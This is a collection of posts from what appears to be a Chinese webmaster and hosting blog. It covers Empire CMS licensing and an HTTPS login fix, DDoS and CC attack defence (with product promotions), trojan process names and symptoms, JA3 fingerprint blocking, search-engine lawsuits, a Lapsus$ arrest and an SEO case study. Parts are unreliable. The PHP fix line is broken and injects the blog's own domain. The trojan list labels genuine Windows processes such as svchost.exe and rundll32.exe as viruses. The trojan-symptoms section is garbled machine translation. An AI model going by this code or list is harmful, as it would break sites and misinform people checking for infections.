日,字节跳动方面表示,搜索产品已经上线,这是今日头条“信息创造价值”理念的延伸,用户可以通过今日头条上面的搜索框进行试用。 8 月 10 日,字节跳动的搜索产品“头条搜索”(m.toutiao.com/search)悄然上线,slogan为搜你想搜的。 未来头条搜索肯定会换上在独立域名,形成跟百度竞争,让我们拭目以待吧。 #### 帝国cms创始人王被告了 起因是有人利用帝国CMS开源版二次开发仿站并出售,然后被告了,帝国CMS也成了第二被告! 帝国创始人狠狠的吐嘈了下国内开源软件环境,事实上,在国外开源软件是免责的,也就是你开发的开源软件如果别人拿来做非法的事,跟开源者是无关的,不过国内就不一定了,去年B2主题的作者就被请去喝茶了,原因是开发的主题被别人用来做违法的事了。 出了这事,让开发者心寒啊,本来一个免费的东西,别人用了还得给他担责,这实在说不过去。 #### 帝国CMS可以免费商用吗? 最近,有同学咨询主机帮帝国CMS是可以免费商用的吗? 主机帮答案是,不可以。起码从法律意义上是不可以的。 我们来看帝国官网是有商业授权的,而且明确规则免费用户只能个人非商业用途,而且免费用户也是要限制的,需要保留帝国版权标识。 找不到的站长可以看这里:http://www.phome.net/service/price/ecms.html 当然,目前帝国还是由创始人王猛本人开发,其目前并没有针对一些侵权行为进行起诉,所以大家看不到帝国起诉侵权的新闻,但这不代表帝国CMS可以免费商用,企业网站或者一些盈利性网站还是需要购买商业授权的,如果你的网站也赚钱,那么支持下开发者是可以的,否则免费不会长久。 如果你使用了帝国的程序,而且也有盈利,那么哪天创始人把这个程序版权卖了,赶紧跑。 #### 帝国CMS启用HTTPS后网站后台登陆显示空白解决办法 最近一位客户在使用百度云加速后,表示后台登不上,登陆后显示空白。 一开始主机吧以为是百度云加速问题,而且通过回源请求发现一样有登陆显示空白的问题。那就说明并不是百度云加速问题了。 然后主机吧原来是客户网站后台使用HTTPS是无法登陆的,而使用HTTP是正常的。查看客户程序原来是使用了帝国CMS,在百度上一搜,原来有大把因为使用HTTPS无法登陆后台的案例。 这里我们截取了一些网上的解决办法给大家。 帝国CMS7.5解决办法 7.5版本已经有了http和https自动识别,但是因为一些疑难杂症的原因,自动识别判断的不准,后台登录也是空白,我们可以打开e/config.php查找’httptype’=>0改为’httptype’=>2即可 'httptype'=>0, 代表自动 'httptype'=>1,代表全站http 'httptype'=>2,代表全站https 'httptype'=>3,代表后台https,前台http 'httptype'=>,代表后台http,前台https 帝国CMS7.2及以下版本解决办法 打开e/class/connect.php 搜索”http:”共两处都修改为’https:’ 这个方法简单易懂就是http链接登陆后就会变成空白,所以看下面比较复杂的方法。同样打开上方文件 然后点击替换ctrl+h搜索: return 'http://'.$domain; 然后替换为: return ($_SERVER['HTTPS'] ? 'https://zhujib.com':'http').'://'.$domain; 这样http还是https两者都可以登录不会变成空白了。 客户按照操作果然成功了。 #### 带www和不带www的域名,可以分别建站吗 问:带www和不带www的域名,可以分别建站吗 答:是的,带www和不带www的域名可以分别建站。这是因为带www和不带www的域名实际上是两个不同的域名,它们可以单独使用或者分别指向不同的网站。 例如,您可以使用example.com来建立一个网站,也可以使用www.example.com来建立另一个网站,这两个网站可以具有不同的内容和设计。 当然,您也可以将这两个域名都指向同一个网站,这样无论用户使用哪个域名来访问您的网站,他们都将被重定向到同一个网站。这可以通过在您的网站服务器上进行相应的配置来实现。 问:为什么很少见到www和不带www的分别建站 答:在过去,因为技术和网络基础设施的限制,很多网站只有一种域名,并且一般都是使用带www的域名。这是因为www被视为Web服务的标准前缀,因此大多数网站都使用www作为默认的主机名。 然而,随着技术的进步和网络基础设施的改善,现在已经可以方便地使用不带www的域名来访问网站。此外,一些网站也开始意识到,使用不带www的域名可以简化网站的地址,并使网站更易于记忆和分享。 因此,现在很少见到使用带www和不带www的域名分别建站。大多数网站只使用一个域名,并且通常是使用不带www的域名作为主要域名。如果用户使用带www的域名访问网站,他们通常会被重定向到不带www的域名。这可以通过在网站服务器上进行相应的配置来实现。 问:用根域名来做网站会影响SEO吗 答:使用根域名(不带www的域名)来做网站不会对SEO产生负面影响,事实上,有时候这还能对SEO产生积极影响。 在过去,搜索引擎可能更喜欢带www的域名,因为www被视为Web服务的标准前缀。因此,许多网站都使用带www的域名作为主要域名。然而,现在搜索引擎已经可以识别不带www的域名,并且不再偏爱任何一种形式的域名。 在实践中,使用不带www的域名可以使您的网站更易于记忆和分享。此外,如果您的网站使用HTTPS,使用根域名可以使您的SSL证书适用于整个域名,而不仅仅是适用于带www的子域名。这可以提高您的网站的安全性和可信度。 最重要的是,无论您使用哪种域名,都应该确保您的网站具有高质量的内容、良好的用户体验、良好的页面加载速度和正确的技术优化等因素。这些因素对于SEO的重要性远远超过了使用哪种形式的域名。 #### 帮客户APP完美解决被DDOS+CC攻击防御案例 最近有一位客户遇到一件很棘手的事情,就是APP被人连续攻击,一开始客户用我们的高防IP,800元一个月的,之前一直防御好好的,结果这几天连续的特殊CC攻击,导致技术需要频繁更换防御策略,而且有些策略一但上了后,误杀非常严重,搞得这边挺难受的,客户中途也换到了知道创宇的加速乐上,结果加速乐搞了一晚也没解决,导致APP关了一晚,第二天早上客户重新找到我们,而后主机吧建议换成专门防御CC的系统。 在试用了三天后,果然完美解决CC问题,不仅防御住了,而且几乎没误杀,客户也安心的续了一个月费用。主机吧也以为事情就这样结束了,结果对方居然不死心,眼见CC打不到了,就换成DDoS攻击,简单粗暴,当然成本相对于CC来说,肯定高很多的,在连续连续攻击几次峰值高达 160G后,果然机房把这边的防御节点封了,理由上超过这个IP的峰值限制了。 主机吧建议客户升级防御峰值,目前的套餐60G峰值,明显防不了这么大的攻击。升级200G,价格有些贵,客户一直在考虑,没有升级,期间由于没攻击了,机房IP也解除了限制,客户重新接入后,到了第二天下午,对方又来攻击了,峰值达120G,这下又封了。 这下客户急了,硬刚,直接升级200G,一个月5800的!升级后机房直接给客户了个高防节点,客户APP马上恢复了,这下终于抗住了,我们来看第二天的攻击流量,一度达超过130G,逼近150G。还好客户升级了200G的。 也许是觉得DDoS不行了,对方又换成CC攻击,QPS达8211,不过还是被我们拦截住了。 目前已经在对方的猛烈攻击下,正常运行了一天了,不知道对方还有什么招,希望对方放弃吧,毕竟一直耗着大家都亏钱……   #### 常见木马病毒有哪些? 木马病毒一直以来都是阻碍计算机和应用软件正常运行的一大“杀手”,过去的主流木马病毒在配置时都具有自定义进程名称和自定义端口等功能,但现在的主流木马病毒更先进,甚至无进程、无端口,这对于查杀和中断病毒进程产生了障碍。所以,我们必须使用专业的安全管理工具进行检测,如果不能确定可疑进程是否是病毒或木马的进程,可以把该进程的全名作为关键词,放进百度或Google等搜素引擎上搜素,找它的相关资料再进行判断。 下面给大家列举一些常见的木马病毒进程: dllhost.exe:冲击波病毒。 Avserve.exe:震荡波病毒。 Bbeagle.exe:恶鹰蠕虫病毒。 Rundll.exe:SCKISS爱情森林。 Rundll32.exe:狩猎者病毒。 Spfw.exe:瑞波变种PX. Runouce.exe:中国黑客病毒。 Netspy.exe:网络精灵。 Checkdll.exe:网络公牛。 Diagcfg.exe:广外女生。 Dvldr32.exe:口令病毒。 Regscan.exe:波特后门变种。 Esafe.exe:将死者病毒。 Tftp:exe:尼姆达病毒。 Flcss.exe:Funlove病毒。 lcsupp95.exe:将死者病毒。 lexplore.exe:恶邮差病毒。 msblast.exe:冲击波病毒。 Rpcsrv.exe:恶邮差病毒。 Svchost.exe:蓝色代码蠕虫病毒。 Scanrew.exe:传奇终结者。 Sysedit32.exe:SCKISS爱情森林。 Scvhost.exe:安哥病毒。 Syshelp.exe:恶邮差病毒。 Internet.exe:传奇幽灵。 Internet.exe:网络神偷。 Kernel32.exe:冰河。 WScript.exe:爱虫病毒。 Vshwin32.exe:将死者病毒。 Vsstart.exe:将死者病毒。 Vw32.exe:将死者病毒。 Wubsys.exe:传奇猎手。 Kiss.exe:传奇天使。 Krn132.exe:求职者病毒。 Load.exe:尼姆达病毒。 Taskbar:FRETHEM密码病毒。 Lockdown2000.exe:将死者病毒。 SY***plr.exe:冰河。 Taskmon.exe:诺维格蠕虫病毒。 Taskmon32:传奇黑眼睛。 Tds2-95.exe:将死者病毒。 Windows.exe:漏洞2000。 Wingate.exe:恶邮差病毒。 Winupdate.exe:Sckiss爱情森林。 Winver.exe:Sckiss爱情森林。 #### 常见的CC攻击方式有哪些?这些攻击要如何防御? 常见的CC攻击方式 CC攻击,全称为Challenge Collapsar攻击,是一种分布式拒绝服务(DDoS)攻击的形式,它通过模拟多个用户对目标服务器发起合法的请求,以此来耗尽服务器的资源,导致服务器无法提供正常服务。以下是一些常见的CC攻击方式: SYN Flood攻击:利用TCP协议的三次握手过程中的漏洞,攻击者发送大量伪造的TCP SYN握手请求,但不完成后续的握手过程,消耗目标系统的资源。 UDP Flood攻击:与SYN Flood攻击类似,利用UDP协议的特性,发送大量伪造的UDP数据包到目标系统,目标系统无法准确判断哪些请求是合法的,从而消耗系统资源。 HTTP Flood攻击:利用HTTP协议进行攻击,攻击者模拟大量的HTTP请求发送到目标系统,使其无法正常处理和响应真实用户的请求。 DNS Amplification攻击:利用DNS服务器的递归查询特性,攻击者发送大量伪造的DNS请求到中间的开放的DNS服务器,请求的目标地址为受害者的IP地址,中间DNS服务器的响应会比请求更大,从而耗尽目标系统的带宽和资源。 ICMP Flood攻击:利用ICMP协议发送大量的伪造的ICMP请求到目标系统,使其无法正常响应。 Slowloris攻击:利用HTTP协议的特性,攻击者发送大量的半开连接到目标服务器,通过不完整的请求保持连接,使服务器资源被长时间占用,无法分配给其他用户。 Application Layer攻击:针对应用层的攻击,通过发送看似合法但实际上会导致服务器资源消耗的请求。 Reflection attack 和 Amplification attack:利用公开的服务器作为反射点,放大攻击者的请求,向受害者发送更多的响应数据,以此来耗尽受害者的资源。 CC攻击的目标通常是网站和Web应用,尤其是流量大、用户多的网站,如电子商务网站、新闻门户、社交媒体平台等。 为了防御以上常见的CC攻击,可以采取以下措施: 1. 使用高防服务和流量清洗设备 选择有实力的云服务商,他们通常会提供高防服务,这些服务配备了专门设计的硬件和软件来过滤恶意流量,减少对服务器的攻击影响,不过这类高防清洗服务往往价格昂贵,比如阿里云DDOS防御1万7每月起,并不是每个用户都可以接受。 2. 实施IP黑白名单管理 通过在防火墙或负载均衡器中设置规则,可以限制或禁止来自已知攻击源的IP地址,同时允许可信的IP地址通过,不过这种只能应对少量IP的CC攻击,一但遇到大规模,多IP攻击,往往由于IP过多而无法有效拦截。 3. 启用Web应用防火墙(WAF) WAF可以帮助识别和阻挡恶意流量,通过配置CC攻击防护规则,可以根据特定的参数(如IP地址、请求频率、用户会话等)来触发防护动作,如百度云防护就是一种云Web应用防火墙,可直接通过域名解析部署WAF,不需要服务器任何操作,有效拦截CC攻击。 有需要的可以了解下:https://zhujib.com/shop/26864.html 4. 使用内容分发网络(CDN) CDN可以分散流量压力,通过将内容缓存到多个CDN节点上,可以减少对原始服务器的直接攻击,同时提供额外的安全层,这有别于说普通CDN,需要CDN有安全防御功能,这就是我们说的高防CDN,这类CDN不仅提供CDN加速服务,还进行WEB应用防火墙,可有效拦截CC攻击,京东云星盾就是这类产品,有需要的可以了解下:https://zhujib.com/shop/20576.html 5. 实施速率限制和访问控制 通过限制用户在特定时间段内可以发送的请求数量,可以防止单个用户或自动化工具(如爬虫或机器人)消耗过多的服务器资源。这个方法只限作用于一些IP访问频繁的CC攻击,实际真实CC攻击场景作用很小。 6. 部署反向代理服务器 反向代理可以帮助分散流量,并在代理服务器上实施安全策略,以防止恶意流量到达后端服务器。此方法不仅需要代理服务器有很高的配置,同时需要在代理服务器部署WAF防火墙,成本相当高,适用一些不差钱而且有技术的同学。 #### 常见的MIME类型设置 MIME类型 MIME (Multipurpose Internet Mail Extensions) 是描述消息内容类型的因特网标准。 MIME 消息能包含文本、图像、音频、视频以及其他应用程序专用的数据。 常用Mime类型: 文件后缀 Mime类型 说明 .flv flv/flv-flash 在线播放 .html或.htm text/html 超文本标记语言文本 .rtf application/rtf RTF文本 .gif image/gif GIF图形 .jpeg或.jpg image/jpeg JPEG图形 .au audio/basic au声音文件 .mid或.midi audio/midi或audio/x-midi MIDI音乐文件 .ra或.ram或.rm audio/x-pn-realaudio RealAudio音乐文件 .mpg或.mpeg或.mp3 video/mpeg MPEG文件 .avi video/x-msvideo AVI文件 .gz application/x-gzip GZIP文件 .tar application/x-tar TAR文件 .exe application/octet-stream 下载文件类型 .rmvb video/vnd.rn-realvideo 在线播放 .txt text/plain 普通文本 .mrp application/octet-stream MRP文件(国内普遍的手机) .ipa application/iphone-package-archive IPA文件(IPHONE) .deb application/x-debian-package-archive DED文件(IPHONE) .apk application/vnd.android.package-archive APK文件(安卓系统) .cab application/vnd.cab-com-archive CAB文件(Windows Mobile) .xap application/x-silverlight-app XAP文件(Windows Phone 7) .sis application/vnd.symbian.install-archive SIS文件(symbian平台) .jar application/java-archive JAR文件(JAVA平台手机通用格式) .jad text/vnd.sun.j2me.app-descriptor JAD文件(JAVA平台手机通用格式) .sisx application/vnd.symbian.epoc/x-sisx-app SISX文件(symbian平台) 以上为供参考的常用MIME类型,可根据需求添加。 比如设置.flv 文件在线播放 #### 常见的PCDN恶意刷流量 JA3指纹 建议拦截 最近主机帮连续两个客户都遭到了刷流量的行为,短短半个月CDN流量使用超过了以前一整个月的用流量,为此特地联系上了百度售后,查询后发现是被固定几个JA3指纹机器刷流量,以下是两个不同网站设备访问前十的JA3指纹。 其中8ab05683f2e4dd948638ab312a972f44、9f25da676e655f9e449963edb2fd271a、8bd06f4341a65d44a68bd2cef7cbedc6 是相同的,而且这些设备访问的网站链接基本都是大量一些网站静态文件,如下图: 因此,基本可以确定这三个JA3指纹是PCDN用户刷流量的。 主机帮建议把这三个JA3拦截了,以免造成CDN流量损失。 操作方法看这里《百度云防护如何使用JA3 指纹拦截》 #### 常见的木马病毒名字 常见的木马病毒会对许多个人和企业造成巨大的损害。 很高兴了解常见木马病毒的可能迹象。 常见的木马 一旦您被感染,病毒就会在您的计算机上进行以下恶意活动: 奇怪的消息和弹出窗口 您是否注意到您的计算机正在向您显示各种弹出窗口和消息? 无论是广告还是说您的 PC 已被感染的消息都没有关系。 你 现在可以确定你开始感受到常见的木马病毒症状了。 您可能在系统上安装了假冒的防病毒软件或间谍软件。 极慢的计算机 如果您认为拥有太多文件并同时运行多个应用程序会降低计算机速度,这并不是唯一的原因。 常见的木马病毒 症状也可能导致这种缓慢,因为它必须使用许多资源。 互联网连接中断 常见的特洛伊木马病毒症状之一是 Internet 速度慢。 很多时候,您也可能无法连接到它。 当你知道家里的其他人或 办公室可以连接,被警告。 这是常见的木马病毒症状之一。 当您被感染时,特洛伊木马病毒可能会连接到 URL 或打开 单独的连接会话。 正因为如此,它会减少可用带宽,或者使使用 Internet 变得毫无希望。 无法使用的应用程序 在进行小故障排除后,您真正需要的应用程序根本无法运行,这一定是常见的特洛伊木马病毒症状之一。 有些程序可以运行,但您的一些 程序不会。 你应该去检查你所有的安全工具和系统来确定。 恶意窗口 是否存在显示页面的不需要的窗口和浏览器? 这是一个常见的木马病毒症状的强烈迹象。 不必要的流量重定向到另一个 欺骗性网站。 这可能会欺骗您使用您根本不会注意到的虚假网站。 缺少文件 这是最可怕的特洛伊木马病毒症状之一。 您丢失的重要文件可能已被木马病毒操纵。 木马可以删除 或加密信息,或将您的文件移动到另一个地方。 当这件事发生在你身上时,你应该担心。 您的防病毒软件已消失且防火墙已禁用 在常见的木马病毒症状期间,不仅文件会在您的计算机中消失,您的防病毒和防火墙功能也会被关闭。 这使您的 计算机更容易受到网络攻击。 严重的计算机安全问题已经发生,您应该迅速做出反应。 语 在您不知情的情况下,您的计算机语言突然发生了变化。 这是一个赠品常见的木马病毒症状。 您的屏幕还可以显示从后到前和其他奇怪的 活动可以告诉你你有一个受感染的计算机系统。 计算机独立运行 你的电脑开始变得一团糟。 您注意到它自己发送电子邮件并进行 Internet 会话。 你肯定遇到了常见的木马 病毒症状。 常见木马病毒的具体类型 鉴于常见 木马病毒 ,也有专门为 具体任务。 它们被智能地执行以窃取、伤害和在您的计算机系统上传播更多的特洛伊木马。 木马病毒的类型描述开发它包含滥用端点上运行的应用程序软件中的漏洞的数据或代码。后门它使恶意用户可以远程访问受感染的计算机。 他们可以做任何他们想做的事情,例如发送、接收、启动和删除文件,显示 数据并重新启动端点。Rootkit这些旨在隐藏系统中的某些对象或活动。 这样可以有效防止恶意程序被检测到。木马银行家其目的是窃取您的网上银行系统、电子支付系统和信用卡或借记卡的账户数据。木马-DDoS该木马可以启动拒绝服务 (DoS) 攻击。 它不仅会影响端点,还会影响网站。 通过发送多个请求 - 从您的计算机 和其他几台受感染的计算机 - 攻击可能会使目标地址过载,从而导致拒绝服务。木马下载器Trojan-Downloaders 可以将新版本的恶意程序下载并安装到您的计算机上 - 包括木马和广告软件。特洛伊木马程序这用于将木马和其他病毒安装到计算机中。 这也可以隐藏对恶意程序的检测。 如果您使用的是弱的或过时的 杀毒软件,其中一些无法扫描此类木马内的所有组件。木马-FakeAVTrojan-FakeAV 程序复制防病毒软件的活动。 创建它们是为了向您勒索钱财。 作为回报,他们将消除检测和威胁 移动。 尽管如此,他们报告的威胁实际上并不存在。木马游戏小偷如果您喜欢游戏,您就会知道在线游戏也可以赚取大量现金。 网络犯罪分子还制作了这种窃取用户帐户信息的木马病毒 来自网络游戏玩家。木马-IM如果您喜欢使用即时通讯程序,这是一种常见的木马病毒,可以夺走您的登录名和密码。木马赎金该木马可以更改您端点上的数据。 这可能导致端点故障。 网络罪犯将要求赎金。 他们只会取代你的电脑 在您付款后执行或解锁您的数据。木马短信它使用移动设备向付费电话号码发送短信。木马间谍Trojan-Spy 程序可以监视您使用计算机的方式——例如,通过跟踪您通过键盘输入的数据、截屏或获取列表 正在运行的应用程序。木马邮件查找器这会从您的端点窃取电子邮件地址。 #### 干扰搜索引擎算法被百度起诉了 1月12日 消息:据北京海淀法院公众号消息,因认为网络公司通过设置广告任务发布平台等行为,帮助用户制造虚假点击数据,扰乱排序结果,原告北京百度网讯科技有限公司将被告深圳市我爱网络技术有限公司诉至法院,要求判令被告消除影响并赔偿经济损失及合理开支共计 500 万元。 海淀法院经审理,一审判决我爱网络公司登报消除影响并赔偿经济损失 200 万元及合理开支 5 万元。该案系全国首例涉人工刷量平台干扰搜索引擎算法不正当竞争纠纷案。 原告百度公司诉称,原告每年投入巨大成本,运营百度搜索引擎。被告是“我爱广告任务网”网站(以下简称“我爱网”)的运营主体。原告发现,被告通过设置广告任务发布平台,帮助诱导网站用户设置、点击搜索任务,利用百度搜索排序算法中用户点击行为占有一定算法比重的客观情况,帮助用户制造虚假点击数据,扰乱原有的客观排序结果。被告行为将不法网站推到搜索结果中的更高位置,进而损害消费者利益。被告在不正当竞争行为中通过从用户充值金币中抽成、流量变现的方式谋取不正当利益。被告的行为扰乱了竞争秩序,构成不正当竞争。 法院经审理认为,“我爱网”直接针对百度搜索引擎进行了定制式的运营。被告在明知原告搜索规则的情况下,引导用户进行了针对原告搜索规则的运营服务。“我爱网”网站中有明确的“任务”设置指引和“做任务”指引,不仅帮助“发任务”用户完成任务的设置,还帮助“接任务”用户做成任务拿到相应的奖励,最终实现帮助“发任务”用户完成向目标网站刷点击量提升在搜索引擎结果中排名的目的。 被告还通过设置VIP模式、“竞价模式”,扩大刷量的规模,使被告获得更高的经济收益。被诉行为的手段是帮助、指引流量需求方发布需求任务,通过“盈利”为诱饵,诱导“接任务”用户伪装成正常用户完成刷量任务,其目的是满足“发任务”用户的刷量需求,干扰搜索引擎算法,提升搜索排名,其行为实质是运营针对搜索引擎进行人工制造虚假点击量的交易平台之行为,被诉行为具有不正当性。 法院还表示,百度公司通过算法分析点击搜索引擎相关结果的数据,如果基于不真实的访问数据,百度公司会作出错误的算法判断,使用户与其所需求网站之间的距离增大,最终导致其丧失在搜索引擎网络服务行业中的竞争优势。“我爱网”的商业模式会产生无效流量,不能真实地反映用户以及市场的需求度,从而使用户花费更大的时间成本搜索到其需求网站,或者根据虚假点击数据作出错误的判断,进而使百度公司丧失用户对其的信任度,降低其竞争优势。 最终法院考虑被告主观故意明显,其被诉不正当竞争行为影响较大、被告在本案中未如实举证等因素作出如上判决。 #### 干货!利用AI工具给你分析网站日志 国内的AI工具出来已经一年多了,很多站长都是拿来写文章,做伪原创,这些都是比较浅的AI使用方法。 今天主机邦教大家一个比较实用的方法,利用AI工具来分析你的网站日志。 一般来说我们的网站都有保存日志,格式为.log的文件。 我们只需要把.log日志文件上传至AI网站,然后问你想知道的东西就行了。 首先我们打开kimi.ai,这是目前主机邦知道的唯一支持上传.log文件的AI。 然后点上传文件,把网站日志文件上传至kimi(需要注意的是日志文件大小不能超过100M),再提问,比如:根据上传的日志,访问最高的UA有哪几个 列出前十 得出答案: kimi直接给你列出了访问最高的UA,我们可以看到好都是爬虫UA,有搜索引擎的,也有自动化工具的爬虫,知道这些信息,我们可以利用WAF应用防火墙,针对性的拦截这些恶意爬虫,非常方便。 我们还可以这样问:日志中哪些URI访问频率特别高? 从上面可以看到,kimi给你分析出了访问频率最高的几个URI地址,并且由哪谁访问的,如果你的网站有受到CC攻击的话,可以利用防火墙对这些地址进行频率限制,是不是很实用呢? 我们还可以问,从日志中,你认为哪些是恶意爬虫 他们有哪些特征? 此时,你已经不需要思考了,AI已经帮你思考了,对站长来说,AI实在太方便了。 未来极可能出现一个AI统计工具,可以根据你的网站统计数据,分析客户想要知道的东西,应该不远了。 #### 年仅17岁的黑客牛人被抓,曾攻击微软 Uber 9月24日 消息:上周末 R 星备受期待的游戏大作《GTA6》的测试版游戏泄密事件的幕后黑手找到了!据BBC报道,伦敦警方通报称,他们已经在牛津郡逮捕到了一名涉嫌网络攻击事件的17岁少年黑客,并表示他目前仍在被拘留,但没有公布任何其他细节。 据路透社记者Matthew Keys透露,这名黑客就是前几日入侵R星的黑客,并且他还同时涉嫌入侵了UBER。 在 Uber 漏洞发生后的一份声明中,该公司在其博客上写道:“我们认为这个攻击者隶属于一个名为 Lapsus$ 的黑客组织,该组织在过去一年左右的时间里越来越活跃”,而且《GTA6》的泄密者在论坛帖子中声称是 Uber 攻击事件的同一人。 据悉,黑客组织 Lapsus$ 自去年年底以来已卷入多起黑客事件,此前包括微软、三星、英伟达和育碧在内的许多科技公司都遭到了其攻击,该黑客组织曾表示自己的主要目标是钱,既无政治性,也没有任何人赞助。 相关事件如下: 2022年3月,窃取英伟达1TB数据的黑客组织Lapsus$提出一项要求:必须在美国时间3月4日(北京时间5日下午4点)结束前,完全开源Windows、macOS、Linux系统的GPU驱动,否则就把机密数据公之于众。 2022年3月,LAPSUS$又攻击了三星,并且公布了从三星服务器窃取的190GB的部分源代码信息。 2022年3月,微软公司证实,Lapsus$获得了该公司系统的有限访问权限。此前,Lapsus$声称成功入侵了微软的系统,并获得了必应(Bing)和Cortana语音助手的源代码。 2022年4月5日,据Apple Insider报道,用于开发Globant“赚取你的Apple Watch”项目的苹果健康源代码可能在近期的Lapsus$黑客攻击中被盗取。 #### 年入百万的我哇减肥网整体SEO优化方案 最近个人事情特别多,所以一直很忙,今天Seven抽空出来给大家分享下我哇减肥网的整体优化方案,这样也是我赚第一桶金的网站,2011年到2012年一年靠这网站做淘宝客赚了一百万,做过淘客的老站长都知道这个网站,上次我就介绍了我哇减肥网的历史,背景很好,基础很扎实,所以优化起来也轻松了不少,大家可以百度下“www. wowawowa. cn”,看看是不是外部资源丰富,我截个图如下。   今天重点详细介绍下我哇减肥网的整体优化方案,上次在介绍网站历史的时候就想先给大家看看网站没改版之前的模板样子,但是改版之前忘记做截图,所以没附上,今天在网络上看到了别人当时COPy我模板的时候有截图,如下图:   上图是我哇减肥网旧模板首页首频截图,当时就是靠这九个广告位卖,靠阿里妈妈淘客一个月赚十几万,可想而知当时减肥行业的疯狂,现在这些电话基本都倒闭了。   这张图片是内容页的截图,估计对方只截图了下半部分,但是首频和上图是一样的,如果把两个图片结合起来那就是完整的内页。  制定我哇减肥网整体优化方案 这个网站丢那整整六年没去管他,期间还被挂马等等,直到月初会想着拿这个网站改版当案例给大家分享整体优化方案也是看重这个网站的基础好,所以7月初就决定制定一个我哇减肥网的整体优化方案,其实对于我来说很简单,就几个细节做好就OK,但是对于很多新手站长来说,可能就比较茫然,无从下手,甚至前段时间一个培训机构的老大还问我是不是购买了大量外链的黑帽手法给做上去排名,我可以肯定的告诉大家完全没有,我的操作细节将全部会在下面详细告诉大家。  一、制作新模板 这个是一个非常重要的工作,很多新手站长都不会自己优化模板,都是从网络下载回来套上去直接用,这样就很没意义了,下载的模板大家都在用,千篇一律,所以我们下载回来一定要自己做调整和优化细节。 在制作新模板之前不少站长建议我在原来模板上面去做修改,他们都很喜欢原来那套清爽的模板,但是那套模板已经是过去适合百度SEO的模板,经过这么多年的更新换代,已经完全不适合在做优化的模板了,其中有两个主要原因: a、没有对应的手机端 可能大家都会说给做个对应手机端模板上去不就可以,这里我就告诉大家一个非常重要的原因,如果长期来考虑,做一个对应手机端模板上去,在百度站长后台做下对应的适配,也许是非常不错的选择,但是短期上排名来说就显得非常慢,等百度同步更新需要很长很长的时间,经过我这半年来的测试观察,要想手机和PC同时快速上排名采用自适应是最好的办法,所以我新站建议大家直接做自适应站点,对于优化来说前期有很大的帮助。 b、模板结构不适合搜索引擎 这套模板是12年初的时候我请人来我工作室指导她做的一个模板,哪里需要用什么标签,哪里需要体现什么数据,就这样我指导她来实现做出来一套非常适合当时搜索引擎的模板,。而对于现在我想快速上排名来说,不大适合,案例网站我在没有做外链的情况下希望是能快速让排名冲上前三页,这就是靠站内优化上排名,所以模板必须重新制作,结构要简单,内容要精简,采用减法的原理,只体现最相关的内容,让要优化的关键词词频能达到最优。 新模板我直接采用的“www.***.com”这个网站的模板,然后做了一些调整,这也是我从网络下载回来修改后做的新站,目前这个网站的排名也非常不错了,也是和我哇减肥网上线时间差不多,比我哇减肥网大概早了五天左右,更新的内容虽然很少,但是排名大家可以看看如下图:   这些关键词都是有指数,而且还很多的竞价,竞争力度还是蛮大的,做了一个月不到的网站,有这个排名我已经很满意了。 我哇减肥网模板制作细节 1、标签的使用 a、H标签   如上图,这个模板下载回来的时候我记得是首页没H1标签,所以我在现在的这个位置加了个H1标签,然后在“最阿暖有效的减肥药排行榜前10名”这个位置也自己添加了个H2标签,如果需要做的更好点,其实底下的减肥药排行榜第1名那个位置应该采用H3标签,这样结构层级就非常合理,这些标签网络刚下回来的模板很多是做的不符合SEO的,有很多的模板H1标签都使用在了LOGO上,个人认为这个对优化很不好,LOGO给个H2标签足够了,内容页的H1标签要给标题就非常OK了。 b、canonical标签 canonical标签,这个标签添加在head标签中间,告诉搜素引擎这是唯一的地址,集权用,详细的百度下,这里不多介绍。 c、nofollow标签 跳转链接处理我采用的就是这个标签,大家是不是发现减肥药排行榜十名这十个链接都是直接跳转到了淘宝去,所以很多新手站在会认为作弊的,会被搜索引擎给惩罚,其实大家可以使用nofollow标签,告诉搜索引擎不要追踪此网页上的链接,也是集权的一种表现。 2、MIP改造 MIP改造主要是针对百度手机端的,而且现在很多的词流量都集中到手机端,这是百度力推的一个方案,所以对于MIP改造的网站我相信百度会给与优先展示权,其目的是解决打开速度问题,目前网站打开速度已经列入了网站排名的计算因素里,而且还相当的重要,所有有能力MIP改造的站长尽量去做,我哇减肥网的大家可以看看源码已经做了MIP改造。  二、HTTPS改造 HTTPS改造需要有独立服务器的站长才能做,因为这个要使用443,而且还需要在服务器上安装证书,建议大家买个独立VPS有不贵,阿里云的国内的一般的一个月百来元,这样就可以做HTTPS,HTTPS的网站安全性更高,所以现在搜索引擎都已经也把这点列入了排名因素。 HTTPS的改造方法很简单,如果你域名在阿里云,直接到后台申请个免费的证书,然后阿里云有详细的教安装步骤,这里就不多做介绍。  三、关键词定位 这次改版连首页的目标关键词页都全部重新定位,可以根据指数和竞争力度选取关键词,我首页关键词虽然定位了三个“什么减肥药效果最好_减肥药排行榜前10名_最安全有效的减肥药”,但是大家在定位关键词的时候要考虑到百度的分词技术,所以定位主关键词的时候尽量选择分词后能组合出更多新的相关词关键词做位我们的目标关键词,当网站权重上去的时候就会有很多你意想不到的长尾关键词排名。  四、关键词布局 很多人看到我的首页关键词布局就认为是关键词堆砌,因为首页的“减肥药排行榜”这个关键词有十几个,如图:   其实这个不算是堆砌,因为每个词后面都跟上了不一样的名次,重点是都打上了超级链接,带了超级链接后搜索引擎认为这是相关的内容,会把这个锚文本计入排名计算范围内,认为这个内容和我们的本页面关键词非常相关,所以才会使用超连方式方便阅读,如果认为这个有堆砌嫌疑的可以参考下百度知道,如图:   所以大家在区分堆砌和不堆砌一个重要因素要判断带没带上超级链接,带上说明相关内容推荐阅读,没有带就很可能堆砌嫌疑。  五、链接提交 改版后我把旧的链接全部提交到了站长工具后台,站长工具后台有详细的批量提交案例,我哇减肥网的数据是PC链接提交一次,然后MIP链接也提交一次,有很多站长不知道如何获取自己网站的所有链接,方法有很多种,一你可以看看你CMS有没有支持生成权重内容链接,二可以采用分析牛链接批量提取工具也可以,具体的大家自己看教程。 到这里重点的细节也都差不多介绍了,我哇减肥网整站改版优化其实就做了这些,事实的结果证明了排名上升非常快,而且我哇减肥网目前还没搭配熊掌号,如果配合熊掌号可能效果会更好,所以建议由条件的站长都给每个网站搭配一个熊掌号,对于手机端的收录排名都有一定的优势,现在排名如下图:   这个是写稿当天的用分析牛覆盖查询工具查询的排名,可以看看上周一写稿的时候排名做个对比,如下图:   这个排名截图是上周写稿时候的排名,两个排名对比,这周的排名又上升了不少,根据我观察,这周大更新这个网站还没有更新到,期待下周更新看看这个站的变化会如何。  总结: 